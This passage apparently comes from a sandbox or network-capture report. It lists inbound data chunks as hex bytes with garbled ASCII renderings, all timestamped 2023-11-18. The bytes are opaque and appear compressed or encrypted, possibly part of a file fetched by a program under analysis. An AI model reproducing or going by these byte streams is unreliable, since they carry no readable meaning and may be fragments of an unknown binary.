de 45 94 f4 21 4e ae 9b 60 c9 ea 8b 81 0f 1b d1 89 bd 61 a7 8d 7e c4 34 ec b4 d2 8f f8 ac 91 92 d2 84 ae ec 58 66 9b 5c 77 43 2c 06 42 c4 1f Data Ascii: EvFW]!v@s<6DoyQG5 [=Z\H?BsctMn70QyQj/qCqt)p50)7>`5pV9]%TsYW_CL<uSFZyQQ~}6#E!N`a~4Xf\wC,B
2023-11-18 09:02:40 UTC	5924	IN	Data Raw: 95 3d d6 9d 95 cd 16 23 58 99 4f e2 ac cc 6e 21 56 96 81 a2 65 14 99 89 32 76 78 e6 8b 51 0e 56 fa c7 bf 9b 58 d6 6c 81 06 e9 c5 40 18 fe 2b 44 c6 af 52 01 ef 2f 16 c3 f8 15 2b 75 3e ba 93 e6 73 e2 7c 1e 00 e4 10 9f 98 e7 cc 1e f8 55 57 7e 37 7e 45 9c 8a 58 56 f5 cf c4 ad f0 c5 15 c4 b2 80 5b d5 9a f8 d4 ae 9e f8 54 87 7e 76 1a 26 86 f1 a9 c8 29 73 95 63 70 2b 7c bf 2b ec cc f4 2c 32 1d 36 a9 7e 68 55 38 41 c7 ee 90 1c 1f c3 e8 1e b9 08 f2 cd f9 61 e8 56 27 52 80 c4 6d 85 7e 50 b2 f7 55 dc d0 d1 f8 a0 25 ea 79 d5 c4 e7 28 5a 5a 19 e3 73 cc 7d 2f 6c 07 6b 1b 8f d1 f6 cd c0 32 fa d6 e5 19 26 68 8a 8f 32 be 96 1c 0c e3 2f 7c bc 61 78 c2 2a c8 1e 8a 7a 5c 62 02 5a 49 18 d0 64 cf 05 41 9d 97 35 72 3a d5 9d 9f 9d fc a7 fc ac 63 04 e3 67 5a 24 3f fb f6 af f1 b3 Data Ascii: =#XOn!Ve2vxQVXl@+DR/+u>s\|UW~7~EXV[T~v&)scp+\|+,26~hU8AaV'Rm~PU%y(ZZs}/lk2&h2/\|ax*z\bZIdA5r:cgZ$?
2023-11-18 09:02:40 UTC	5935	IN	Data Raw: be f9 4b 79 6a ca d5 49 7c 0a f2 c2 fd fa 89 44 87 8f af b8 cd 7d 54 fc 84 82 32 8d 41 8d 31 fc ef 4f 0b 15 d0 0d 1c 1c fb fd ce 20 c6 eb 2a c4 b8 f1 2d 02 7a 33 f9 0f 84 22 bd e8 ef 3f c2 f7 5b 43 ef dd 3b 53 d5 12 c2 c2 0c 3f 06 c9 a9 ba 54 90 3d fd b8 e6 6e 42 c4 be ac 8b b2 2f 87 7f 0b a4 e3 7e 1e 77 f9 fa 88 0a 2b a2 54 38 b6 1d 2a 8c e5 15 2a 22 2a 7c 12 a5 c2 5a ac 70 0a af e0 89 a8 d0 10 a5 c2 33 58 41 e3 91 ad e7 46 54 58 19 a5 c2 ad 58 e1 63 a8 f0 09 5a e2 f8 47 b0 78 99 b6 25 7f 81 1b 65 60 d5 ca 50 fc 4f ed f9 b3 50 e2 f0 2b 47 98 82 41 87 3b 1e 88 fd 37 76 9a d7 2d 9b af cb 24 5d b6 70 ec 37 a3 c8 ac c7 ba 0b 18 57 bc d5 5d c0 58 16 03 02 46 6c 27 b3 86 f4 5f c5 23 2f 8e fb 0b 63 9f b9 0d c6 be 9e 47 5e 35 0b 0d 4f c3 36 f7 1f 65 1f 6c 6f 44 Data Ascii: KyjI\|D}T2A1O -z3"?[C;S?T=nB/~w+T8"\|Zp3XAFTXXcZGx%e`POP+GA;7v-$]p7W]XFl'_#/cG^5O6eloD
2023-11-18 09:02:40 UTC	5967	IN	Data Raw: 69 fb 9d e0 68 9e 97 9e e2 7a 09 9b 17 1a 62 68 eb ae ec 8d d6 58 36 5a 20 6e 36 3f e1 aa 41 82 c1 72 80 c3 c7 cd 30 22 96 e8 28 7b 4e 0c a2 2c b1 91 0e b3 9f 41 11 0d 0d b1 72 d7 5a 1a da 40 8c 11 c9 10 60 12 b6 bd 8e 5e bb 2e c0 11 06 bb 8d f0 ed 28 23 4c 83 11 fa af e5 79 12 8a 12 79 63 e4 0d ff 00 eb e3 c3 3f 61 47 93 38 3b 2a e7 ec 68 0a 67 47 53 ff 5b 76 f4 3b b7 c5 a3 d4 b1 65 f6 0a f4 64 28 01 da 57 6e 47 2f 01 8c 3b 56 8a 99 2b 30 4f 16 3c a3 fe 78 12 5e 93 c3 f3 54 cc 4c 01 cf 53 ba 75 5d 66 b7 51 10 55 2b da f2 22 0a 33 ab 3e 80 fb 36 3d 98 c6 bc b1 ba 71 e0 58 16 02 5c 63 28 51 61 c8 39 65 64 06 9c 14 39 6e c4 a7 5d cf e2 09 c0 6f eb 8a f4 ff a4 bc 20 ab c3 d7 c1 1d 65 1d 5e b9 1c d6 61 8f 91 87 cd e6 ef b6 7a b3 a2 d4 ba 1d 6b bd 87 d6 fc 99 Data Ascii: ihzbhX6Z n6?Ar0"({N,ArZ@`^.(#Lyyc?aG8;*hgGS[v;ed(WnG/;V+0O<x^TLSu]fQU+"3>6=qX\c(Qa9ed9n]o e^azk
2023-11-18 09:02:40 UTC	5983	IN	Data Raw: 3d a9 71 a9 c6 9f b9 f2 71 46 93 5b 5a 05 7f cd 3d 49 d1 82 02 40 2b 8e e6 3c 01 00 3e fa 58 ec 56 6a 88 9e a2 90 f5 52 cc e4 62 b6 26 b1 73 b9 c3 ee 60 23 aa ea ce 17 a8 ca d5 51 85 27 22 a3 ec 1d f7 1e 61 00 dc 6e 63 87 4e a0 53 6a 21 fa fb 6f 11 53 ef 0f 8a 05 4c 7d 02 48 13 4e e1 9a e8 c8 33 4e 7e 3b cd 6a d5 09 72 f5 b7 9b d5 ca c7 71 56 ab 62 f3 58 43 b5 b5 51 d3 ab c2 07 b0 0e d3 e5 0e 5d 49 65 5d c3 89 57 5d 58 8e 57 54 67 b3 53 7d 83 29 be a2 0f 37 07 f4 7e d9 6c 1f f9 50 37 07 60 84 47 5d bd 17 95 8b f8 3b 06 ff bd 03 19 fc 50 e9 09 1a c6 c4 fb ef d9 e0 e7 90 61 ce 3f ae 00 9b 39 1a 8c f6 2d 08 f3 f7 c8 7e bc 3e a2 df 85 6e d1 40 7f 5f ea 6e 80 06 f4 de 93 e4 bd c7 f0 de 9b e4 bd d7 f0 de 9f e4 3d 01 c0 e3 19 78 99 46 4c eb 50 1e 98 81 b5 3a 98 Data Ascii: =qqF[Z=I@+<>XVjRb&s`#Q'"ancNSj!oSL}HN3N~;jrqVbXCQ]Ie]W]XWTgS})7~lP7`G];Pa?9-~>n@_n=xFLP:
2023-11-18 09:02:40 UTC	5999	IN	Data Raw: 29 11 82 a6 f3 8e 66 93 b8 03 7c a6 03 c2 61 31 68 6f 66 20 02 73 4d da 71 4d 1a e4 e7 18 90 3f 3a 93 91 7f 77 12 f2 15 31 c2 d3 c6 f8 d7 99 44 df dd 5a 45 72 3c f9 ed 71 7d 57 ff be 21 cd f7 1b e0 7b 2d 57 8f 37 d1 f9 e1 da ff b5 70 11 96 ff 49 40 fd 50 1a a8 6d 06 a8 cb 05 d4 0f 27 41 7d 7f 9a 51 a7 e0 a8 cf 27 22 b4 12 a3 dc 47 50 8b fe f5 3e 4c d8 39 74 05 8f 53 9b 34 ce d3 69 c6 d9 0c 6d b5 d9 28 66 9f 28 9c 6c b0 6f 88 3e f1 50 a8 10 e8 b3 08 8b bf 5f 8f 34 32 7f 1b d3 48 8b 7a c9 36 52 56 1c e2 64 26 36 71 13 c0 a7 ec 00 02 11 69 43 7c 1e ff 4e 97 4e 0e 84 ef 10 8e 9b 06 db cf 1a e0 91 af 40 ad d1 45 79 17 cc fc f5 15 a6 24 d3 ac b3 0c b3 3e 9a cf b3 fe 6b d2 28 be 34 a3 34 e7 1b 47 41 f8 c4 7e f4 b2 f2 99 b4 17 75 13 04 b7 2a a0 42 0a dc 9a 50 37 Data Ascii: )f\|a1hof sMqM?:w1DZEr<q}W!{-W7pI@Pm'A}Q'"GP>L9tS4im(f(lo>P_42Hz6RVd&6qiC\|NN@Ey$>k(44GA~u*BP7
2023-11-18 09:02:40 UTC	6015	IN	Data Raw: ca 63 e2 d6 c2 6b f5 60 bc 9e f5 5f 00 d1 53 4b 00 2d f1 d7 43 79 69 81 11 f8 37 3c b8 78 9f 8c 42 e8 ef 56 f1 52 2f 7b 7f a3 b2 6a aa a0 35 95 4f 89 a0 bd 1b 40 11 9b 6b c7 8b 58 32 a8 a6 b4 14 35 8d c3 9a 46 0c f2 77 c7 f4 2b c1 f1 40 93 a4 5f 67 48 53 32 04 63 74 fa 3d b4 85 66 2b f0 4b a0 67 5f 7e 42 a5 67 3b b0 a6 3d 16 39 a8 9e c7 f2 f0 cd a0 a9 5a c5 72 49 79 24 d9 22 91 64 79 08 7e 1f 82 db 9c 86 95 04 c6 26 16 23 fd 71 c2 3a 61 df 84 74 a4 f3 b6 4c 99 61 7e 6b f2 81 73 e5 de c0 42 d1 55 f4 b1 cb 28 d4 fd 9d 8a 7c 1b e8 a5 26 56 5b d1 56 75 af b8 41 35 c5 2b eb f6 b2 7c 79 70 fc e8 6a 11 d6 25 36 5d fb 24 2e d6 c0 e7 a2 55 0f 73 8b 79 26 87 bd ca df 09 2f a3 f9 03 5c 00 b0 da f3 2f 1a 43 c7 e0 f9 b8 bf ec 95 65 b8 2e 9e 7d ac 9b f4 3f fc dd 0c f7 Data Ascii: ck`_SK-Cyi7<xBVR/{j5O@kX25Fw+@_gHS2ct=f+Kg_~Bg;=9ZrIy$"dy~&#q:atLa~ksBU(\|&V[VuA5+\|ypj%6]$.Usy&/\/Ce.}?
2023-11-18 09:02:40 UTC	6031	IN	Data Raw: 8f 48 c1 42 ad 5a da d9 41 63 e9 b0 24 f5 d3 b0 68 a5 4e 63 9a 3a 0b 48 a4 08 9c 68 d6 62 cd 6c e1 c3 3a 7b d0 39 e7 28 31 24 de d0 5e 04 30 46 e9 35 a2 6d 46 00 0e 1d 76 1e 0f 3c df 8b ce a8 c2 03 75 ae 97 02 39 5a 84 07 56 23 cc 9e 34 18 92 d2 5e 05 01 12 51 0f 8d 48 c6 60 2a 64 0b d1 30 1c 22 d2 06 9d 08 c0 81 6a 68 69 74 49 28 c0 ec 90 ea 61 b4 a8 bd c7 c7 67 3f 21 22 62 17 19 8c 86 49 bc a0 56 e1 a7 8c c3 0c 33 30 b4 31 86 86 8b b5 85 fc a4 3c 4a 30 1c cc 33 81 43 54 c1 c1 cd c3 a1 00 05 50 14 84 c3 8f 79 ee 3c 22 b0 21 ae c6 9e a2 20 f1 bf 52 22 9d 76 ab 76 dc d9 59 65 da c5 50 58 e5 0c b0 0d 2c c0 41 1c e7 35 06 50 30 8c 58 af 88 3e b8 ac fc 3a 31 48 d4 97 d8 c0 ce 54 7d d8 19 11 a3 b0 9d 12 0e 8c 83 55 05 1c ec e3 cd e5 28 cd 54 a3 8d 89 37 60 4a Data Ascii: HBZAc$hNc:Hhbl:{9(1$^0F5mFv<u9ZV#4^QH`*d0"jhitI(ag?!"bIV301<J03CTPy<"! R"vvYePX,A5P0X>:1HT}U(T7`J
2023-11-18 09:02:40 UTC	6047	IN	Data Raw: ed 3e 92 84 b8 21 36 4e 6f 34 c9 97 f0 09 17 c8 1f a2 63 94 6f b4 9c 59 8f 11 b9 e2 15 72 b4 da af 2e ac e4 f1 41 5a 30 8d 72 30 ce d8 3f d7 68 7d f0 56 2e 8f d1 66 5d 8e c1 f5 5c 3d 7c 0a bf b7 90 1b a3 a0 db 01 5d 96 00 ad d8 53 1b 23 8c ca 18 a3 29 8d 5f 41 b3 ea 1f ee 15 37 f9 d1 5c 57 ea 54 ce c2 3d 8d 33 f7 2c c5 97 83 f9 e8 26 3a ad 31 f0 67 b2 b3 e8 2c ab 76 af 92 79 62 f6 e3 b4 9a cd 30 33 0f cc 28 06 77 22 99 7e 75 51 32 d7 45 33 9c bb 10 a6 fb 32 a9 d5 22 13 06 d0 11 72 43 73 04 03 28 92 91 f3 7d b3 29 d8 7d 89 67 55 b9 c0 06 40 82 9d 54 aa 3c 7c d7 b0 c8 dc d4 83 68 e9 a8 09 56 eb 07 a6 74 74 f0 1d c5 b6 8c 61 df f0 98 f3 2e 72 86 cd 20 ff c1 77 f9 82 0f e7 0b 4f c7 92 43 c4 ef 1a fd f2 f7 f9 1e 43 58 3e 14 54 f0 50 65 c4 9d 62 3f 1a b6 3b d1 Data Ascii: >!6No4coYr.AZ0r0?h}V.f]\=\|]S#)_A7\WT=3,&:1g,vyb03(w"~uQ2E32"rCs(})}gU@T<\|hVtta.r wOCCX>TPeb?;
2023-11-18 09:02:40 UTC	6079	IN	Data Raw: f0 7c 40 a6 73 59 28 39 e5 55 68 ec 79 28 e4 5c 87 b8 19 98 8e 96 e9 67 f6 f6 11 fe 2c cb f0 84 c7 9c cf 26 a9 c3 b3 b5 c3 73 4b 74 be 9b 65 3f 45 3f 1b f7 21 c5 d9 11 85 b9 4a 7e 87 62 5b d8 06 e7 4d f1 36 74 bc ff 58 1a b1 3f 4b bc 5c d3 55 58 ce b5 dd 6c 1a fa f9 6d fa 34 35 87 3e ad 34 6b e9 eb f9 27 e9 5a fa f4 2a 2b 8d 30 8c 0f e0 13 66 94 97 bc 55 cb 5e be 3e 6f 8a 9a 57 1d 9c 5b d9 f1 3e 05 db 38 92 d5 78 7e 45 34 73 81 4c 9c 8a 56 56 8a f4 da a0 56 0c 97 79 20 74 bc aa f3 e5 1e 75 dc 94 e0 99 1c 6e c8 87 5a d0 7d a1 36 66 6e a8 31 71 dc 14 d7 e5 ea a7 17 23 d7 2d 73 28 fa 63 d7 92 eb 82 7b 07 2c 47 12 b1 ff 50 48 78 00 c0 56 69 ed 6a 3c 44 2d 15 fb 0e 8d 67 34 bf 4c 23 47 42 ef d9 8a f0 33 18 62 a1 78 14 d7 23 66 f2 cb 80 3c d5 1f 9e 40 86 ea 0c Data Ascii: \|@sY(9Uhy(\g,&sKte?E?!J~b[M6tX?K\UXlm45>4k'Z*+0fU^>oW[>8x~E4sLVVVy tunZ}6fn1q#-s(c{,GPHxVij<D-g4L#GB3bx#f<@
2023-11-18 09:02:40 UTC	6095	IN	Data Raw: bb ef 1e 04 40 96 f6 ee dd 7b 27 00 57 ca cf cf 3f 02 40 95 ee bf ff fe d9 00 4c 69 f9 f2 e5 7b 00 88 40 5a 9b 5f 00 e0 49 7f f9 cb 5f ce 03 a0 01 89 bd 73 39 00 4b 1a 3a 74 e8 60 00 12 90 da fc 67 00 38 d2 ab af be 3a 0c 80 02 24 e7 fb 02 80 21 b5 b6 b6 5e 04 40 00 d2 7b e0 21 98 bc d4 ad 5b b7 05 30 69 20 c1 cf ee 85 c9 4a a3 46 8d 5a 08 93 04 52 6c f9 1d 26 27 1d 38 70 60 29 4c 0a 48 f2 dd 13 30 19 a9 7b f7 ee 37 c2 24 a4 cb 2e bb ec 39 18 bc 74 cd 35 d7 dc 0d 83 06 12 bd 20 1f 06 2b 4d 9e 3c 79 39 0c 12 48 35 eb 2f 30 38 29 23 23 63 28 0c 0a 48 f6 d0 ab 30 18 e9 f5 d7 5f 6f 85 41 00 e9 66 77 83 ce a5 e4 e4 e4 51 d0 29 90 f0 a6 03 d0 99 f4 c8 23 8f 74 87 4e a4 cf 3f ff fc 1a 68 5c 5a b7 6e dd 64 68 14 48 3a 27 03 1a 93 fc 7e ff eb d0 08 90 f6 19 c9 50 Data Ascii: @{'W?@Li{@Z_I_s9K:t`g8:$!^@{![0i JFZRl&'8p`)LH0{7$.9t5 +M<y9H5/08)##c(H0_oAfwQ)#tN?h\ZndhH:'~P
2023-11-18 09:02:40 UTC	6111	IN	Data Raw: 93 97 ad 58 77 ab e9 d7 4a 94 af fb 93 e4 4b ae 93 2b 7f b4 8e ff ef f2 7a ee d3 c8 ff d0 30 f2 f8 c7 a4 e1 7f df 3b 22 a8 27 bc 04 33 8d bf ed 18 4f e3 53 9c 5f 56 0e b5 58 59 07 62 67 97 88 c0 cc 4e 63 66 09 a2 2e fc 17 72 68 eb 79 48 3b f4 30 0d fd 5d 81 5e bb ab e5 26 69 c1 fc 3d 09 a3 87 25 46 ab 58 f2 bc 51 ef 9e 98 fd 43 38 45 dc 71 fa 45 aa 31 62 4b 5c cb dc b3 b7 3f 6a 28 f8 20 ed 8b 56 fa 80 bb 57 cc 49 4c a9 82 49 0c 5f d7 62 98 7e 44 70 be 32 47 20 3f 83 da f7 b4 d7 39 c8 ba 21 4d 34 ca a9 13 6d 32 c8 0e 93 62 9d fd ce 7f c5 b2 e3 bd 6f 4a 5d cb 43 f4 e0 2c 56 41 b9 40 ce 8c aa 11 c5 0a d2 f9 2c 5b c4 c5 d6 52 bf dd 13 f9 b1 b4 87 6a 39 76 d6 50 c0 94 f5 34 2b 61 60 c2 58 ad 1f cb fa c7 15 e8 b2 23 4b c7 43 63 6c 53 ba 9a de 00 9d b5 7c 35 79 Data Ascii: XwJK+z0;"'3OS_VXYbgNcf.rhyH;0]^&i=%FXQC8EqE1bK\?j( VWILI_b~Dp2G ?9!M4m2boJ]C,VA@,[Rj9vP4+a`X#KCclS\|5y
2023-11-18 09:02:40 UTC	6127	IN	Data Raw: f3 a8 8e 80 f3 21 cd 0b fa 83 cd 49 64 9f 1c e8 bb d3 5a 69 bd 0c de 5d ad 6a a2 45 df e5 2b b3 fa 47 c0 82 06 7a 1a 17 f8 fd 79 2a 36 1a 03 99 af 33 2a 53 2e ad a8 55 59 3b 55 af d7 e1 e7 c5 d6 c0 34 06 bf f2 d6 21 ee a4 f2 05 ea 10 cd f3 37 f0 d5 d9 9a 0d 59 d8 f5 56 60 23 eb 55 a8 2c e2 d9 aa 60 70 a3 33 bb 10 1c a8 f6 5b 89 d3 2e 89 81 b8 c8 48 3f 5d 82 f8 a8 1c f2 87 59 f9 59 3b c3 8d c9 d1 12 ff 8a f5 6c 7f 2f 43 9a b7 3c b5 bc c5 ae 79 a1 5a 98 56 35 45 2d 6f 7d 5c f3 0c 61 1f ca 5b d3 35 cf 04 04 c7 4e 61 b1 67 e7 91 e9 39 54 76 8d be 5d ab da 37 e3 ac 75 52 27 55 f3 40 ea 67 6d eb 1d 6a c5 76 15 12 8b eb fb d8 fe 8f a2 9e b2 3e 4f 55 f4 ed 9c 14 c0 61 46 55 bd 2f 39 87 fa e3 4c bd 01 53 bf 17 d8 b3 c0 c0 5b 99 0a 12 e7 1f 12 48 05 fd 5c 8f 3e ca Data Ascii: !IdZi]jE+Gzy63S.UY;U4!7YV`#U,`p3[.H?]YY;l/C<yZV5E-o}\a[5Nag9Tv]7uR'U@gmjv>OUaFU/9LS[H\>
2023-11-18 09:02:40 UTC	6159	IN	Data Raw: 78 38 8a 0a 0c e7 87 de 18 a0 1c f3 c5 5f 21 81 8a 82 88 cf cb 82 f1 f3 5c 77 c9 31 f2 14 8b bb 16 d2 d6 c2 aa d7 cd 90 8c 83 0d dd ea 92 19 3e 71 cf 3e 40 71 99 8e 41 d5 63 a4 29 16 a1 0a f2 81 6a de 18 c7 0e ef 58 ba 9d 93 e5 99 e4 bc cc 17 1f 23 54 f5 87 30 6b d5 66 a1 6a 18 74 d3 18 e3 ed eb 38 ea 9d 0c 0b 38 49 f0 3c 42 15 80 a9 52 4f 5e dc 7d 29 d4 cf dc 73 dc b9 df 7c 80 5f 9f ae 92 ff 05 dc 43 bb c2 9d a3 5d 1d 43 40 f6 c6 20 d0 99 07 84 ca 87 60 e2 28 d8 d8 f8 d5 7d 09 ec 04 5c 04 3c f3 80 cb ad 4e 04 3e 9b f9 b1 3d e8 af 10 cc d7 00 f9 18 e4 b5 22 38 ba cb 6f 63 f6 06 34 27 ad 14 5f a1 74 99 81 93 54 29 be 4e bf a4 90 9f 6f 30 4d af 7e fa 29 23 3b fb 47 98 f1 21 5b 78 1a 92 c1 cb 95 34 ff 43 1f f9 23 11 22 aa 12 32 f8 17 3a cd c5 80 2a 1a f2 e7 Data Ascii: x8_!\w1>q>@qAc)jX#T0kfjt88I<BRO^})s\|_C]C@ `(}\<N>="8oc4'_tT)No0M~)#;G![x4C#"2:*
2023-11-18 09:02:40 UTC	6183	IN	Data Raw: b6 c2 1c 6d 1b 23 7b ef 57 82 5c 4f 98 b6 5d 91 a3 6d e5 39 da f6 ad 9c fb 95 e9 bc 26 d3 b6 ef e7 68 db bc 21 da 56 d8 ef 6a 5b 76 7f e1 55 de bc f4 82 fa 96 bd d0 8f 84 3b 8b 7d bc 00 db b1 fb 1e 40 77 ea 69 14 74 a8 7f 18 e9 fd b0 b5 df f0 d6 47 d5 31 8f 00 fd e7 de fa a8 35 66 17 ec 98 c7 f9 8d 44 56 61 cc 3d 40 bf 47 d0 5d 7d 30 5b 81 7e 93 97 8e aa 60 02 2e b2 3d d9 db 0f 6a 81 f9 3e d0 c7 7b e9 a8 00 e6 db 40 cf 13 74 77 ef 9b bf 03 7a 4f c6 43 c7 6d 6f be 08 f4 f6 8c a7 1f b6 e3 e1 19 d6 5e cb e9 6b 9c 5c 41 7a ec 1a 84 85 b2 ff d9 db 1e 6f c1 cc 7f 02 fa e3 1e 8d 61 f1 96 ff aa 2f 7f 49 7d d9 7b f2 af fa f2 ff 5d 5f ce ff de 0f 9f 10 13 ab 43 db 19 90 62 8b e7 7b ff 6b f8 6e b8 69 2a be 30 69 ca 93 f8 e3 7e 57 e9 45 92 be 19 e2 a9 d4 8c e9 a9 86 Data Ascii: m#{W\O]m9&h!Vj[vU;}@witG15fDVa=@G]}0[~`.=j>{@twzOCmo^k\Azoa/I}{]_Cb{kni*0i~WE
2023-11-18 09:02:40 UTC	6199	IN	Data Raw: 1b 48 9e 09 84 ed f6 03 22 bd 4c ab c7 3e b0 04 d3 fa a9 23 54 8f 32 89 46 0d b2 18 f5 b9 24 b7 7a d5 df e9 5c da 49 64 a0 18 9e b7 0f 22 7a 74 1a 1e a1 59 16 41 f3 2b 0f d4 ae eb 89 4d a8 70 a0 4a a8 28 b7 44 a9 72 af ba 71 10 56 0f fd d2 a8 47 5a 33 0e 89 df e5 f7 0f b5 8b 8c 55 78 ea 96 10 53 70 d1 6a 6a ce 04 6a 8e 4f 6c ad 62 e3 44 43 dd 53 2a 88 b7 ee 47 5a 98 f1 42 43 08 bd 8a 84 86 55 39 20 90 d7 76 da 51 aa ad ad 16 d2 5f 80 ba 6e 0f 77 c1 c1 dd 54 c9 8b ba e1 54 94 82 ff c0 a4 fa 2c 76 82 74 2b 8c ec 1c f0 a2 2f 9f 4f ed 39 d4 83 2b 84 29 4c 31 9b 1e d6 7d 4c 22 6a 5e 3c 81 c1 ad 3f f8 65 fa f6 49 08 91 01 9e 67 a5 8a 97 57 88 a8 72 3e 74 0d e4 77 4d 55 0a b8 68 28 12 84 3f f7 56 fa 6d 98 cb 64 2b 75 3c ee 07 e7 b6 b6 b8 e6 8a 19 de ce 02 1c 8e Data Ascii: H"L>#T2F$z\Id"ztYA+MpJ(DrqVGZ3UxSpjjjOlbDCS*GZBCU9 vQ_nwTT,vt+/O9+)L1}L"j^<?eIgWr>twMUh(?Vmd+u<
2023-11-18 09:02:40 UTC	6215	IN	Data Raw: 7e 86 14 34 ae 40 2d 9a ec 31 9a 32 f9 6f 42 1d 9a ed 11 9a 36 ea 32 70 dc de 04 a5 3e 47 0f 31 46 69 e6 c6 66 20 8f e3 6b 13 57 d6 92 c6 1c a9 16 4f 19 4f e6 1f 6d 3f e0 f3 9d 42 6b 3d 81 c7 e8 03 5f 6b 30 ef 2b 4d a4 5e b6 87 59 41 f8 80 3d c8 4c 1c 1b fe 0c 37 bc d6 2a fa 19 26 91 d2 f0 1c 78 0a af ee f7 d2 e5 fd da c4 e5 b5 c6 51 35 9d 7f b8 fd 38 c6 12 e5 84 52 e8 65 e3 84 a8 28 98 cc 15 0b 98 1f 4a 3e b5 56 31 eb 3d e0 35 f7 71 b5 57 f2 82 24 b8 7a 23 7d 8a 8e bb d6 9e 70 5a 50 06 35 7e d5 20 d6 62 b2 ca 7a c1 20 95 43 a7 fc ac 07 8f 07 fd 36 6b d7 e3 19 6b 9e 4f f4 9c f1 98 f5 49 85 00 43 07 7d 3e dd 55 2b 88 06 9e c6 44 55 34 4f 9a e9 d9 12 08 09 07 b0 4a 78 db c6 ea 86 b5 5a d5 30 0f 33 d2 c1 58 d5 a8 55 24 f5 24 75 93 f6 13 58 d7 d2 09 ea 84 66 Data Ascii: ~4@-12oB62p>G1Fif kWOOm?Bk=_k0+M^YA=L7*&xQ58Re(J>V1=5qW$z#}pZP5~ bz C6kkOIC}>U+DU4OJxZ03XU$$uXf
2023-11-18 09:02:40 UTC	6231	IN	Data Raw: a9 df 42 15 06 ad 14 f5 91 df a2 3d 44 9a 3a 9c 18 e5 e9 b3 fe 76 35 75 79 89 28 60 d1 d6 c7 6f 25 ff f3 3f 91 8a dc d0 78 f0 91 f1 33 07 9f e6 0a 57 8c 9f 49 c0 67 b2 f9 9f 6f f2 9a 23 7c 00 b5 e3 87 0c 8f 21 42 d2 93 b6 79 4e c6 59 d3 cc b1 76 d8 6c 05 10 b6 d8 e0 72 4e 3f 7a 03 59 8a d8 4c 37 27 db 76 52 5c d7 2a d2 66 b1 c7 8b 3a fe f7 fc 25 b5 13 f5 6e 60 57 59 98 dc f0 6f c9 da 54 61 9c d1 12 c0 af 3a 99 53 e5 f8 8d b2 5f 6b f2 cd df 06 3f 84 c6 98 4b 7e e0 93 f4 59 1d 67 05 95 64 c1 27 b9 67 ca 0c a7 47 36 dc ea 35 27 b5 7e 84 5e 0a 0c ba e6 a4 56 f7 ee c3 a6 7e e5 6b 13 c9 bb 76 df c4 ed df 18 3b 8f 8f 38 8b f1 59 07 8d db 6c f2 f3 3d 4b f8 4e da 51 7b 9b f4 5b e3 fb 60 a7 f6 b9 11 ea d7 87 c6 63 fb 8a a0 6b bf 32 a1 ed 39 f6 9e 6f 46 52 12 56 c7 Data Ascii: B=D:v5uy(`o%?x3WIgo#\|!ByNYvlrN?zYL7'vR\*f:%n`WYoTa:S_k?K~Ygd'gG65'~^V~kv;8Yl=KNQ{[`ck29oFRV
2023-11-18 09:02:40 UTC	6364	IN	Data Raw: f9 db 61 4f 66 d1 dd 56 14 72 b9 e6 31 70 4b a4 2a 7f 8b e2 c6 0c ed c5 76 4c cd 5e 0c 79 b2 b2 c1 d5 9a 29 19 e0 67 5d 22 e5 82 93 35 a4 5a 2f 4e 87 03 3e 70 af 2e 91 8a c0 b7 ba 44 2a 06 c7 6a 38 44 2e f6 c2 d1 9b 52 ec 83 c3 60 a5 38 8b fd cc 51 8a 03 ec 67 ae 52 9c ad e4 42 8e f3 72 48 ae 52 cb d7 ca 5a b6 f6 cb bb fd 2d b5 b3 20 e6 ad d7 0f 87 7a 3e 90 e3 c2 be 28 7f 14 ee 4a 71 3d 10 81 45 93 ad 0d ae db ef 81 11 65 23 cd a4 94 52 54 cd 7a 4d 8e ba 5e d8 b0 7d 5f 7b 83 c7 55 d8 ec 2a 6c 0c 83 1c 90 29 f2 f9 ae 30 1c 07 0f fc 05 b2 f6 c1 ed 46 86 dd 03 5c 21 ff c2 46 c1 51 93 2e b7 c1 fa d9 f0 93 23 dc 98 26 ef 19 c5 80 2b 97 83 a7 12 77 03 1e c5 f6 57 96 d8 fd 15 4a be 5f 10 2d a0 08 47 1d ac 74 0d e8 04 19 ac b8 cf 15 99 08 26 87 77 55 e9 64 0a 40 Data Ascii: aOfVr1pKvL^y)g]"5Z/N>p.Dj8D.R`8QgRBrHRZ- z>(Jq=Ee#RTzM^}_{U*l)0F\!FQ.#&+wWJ_-Gt&wUd@
2023-11-18 09:02:40 UTC	6380	IN	Data Raw: 7f 75 7e 77 31 74 11 3a af a7 b6 9d 87 fa c4 48 b1 cf 5a 15 7b bb 74 83 a9 97 3f 95 49 2f f7 1a d1 39 70 9c cc f4 f0 ab 66 8c a6 79 9c a6 9b af 12 34 cd 26 9a 4a a9 bd 93 95 fc 00 de 2f c7 a6 e6 2b 13 73 22 5b 2b c1 b9 3c c0 08 4e 46 e2 ac e0 04 ce 48 1d c8 40 c1 68 28 27 81 57 ba 70 5a bb 54 99 42 5e d7 a9 6d 23 f5 fd e2 f8 7e da d1 60 b6 ff 99 da 81 f1 00 7e c8 00 f3 03 1b 54 f5 e1 7f 74 68 e6 d3 83 f8 7c 15 00 04 8d 3a fb 79 0e 67 94 07 a6 52 27 ff 41 f9 72 5e 3e fa 5c 9f f2 c0 54 6a ea 1f 94 4f e3 e5 5f 8e 2b cf 97 7c 27 70 22 17 fb 28 e3 c4 f5 c0 21 37 f6 81 c7 a3 0e 0e af c3 8d 79 3c 71 fd 8c 3e 00 55 6f 7d fd 7f d3 07 40 80 67 60 3f f4 15 f5 43 df 1d 37 24 a6 af 28 8e be 35 8f f5 4b 1f 80 aa db fe fe bf e9 2b e2 f4 dd f0 ac a9 3e e1 5f 57 45 3e 75 Data Ascii: u~w1t:HZ{t?I/9pfy4&J/+s"[+<NFH@h('WpZTB^m#~`~Tth\|:ygR'Ar^>\TjO_+\|'p"(!7y<q>Uo}@g`?C7$(5K+>_WE>u
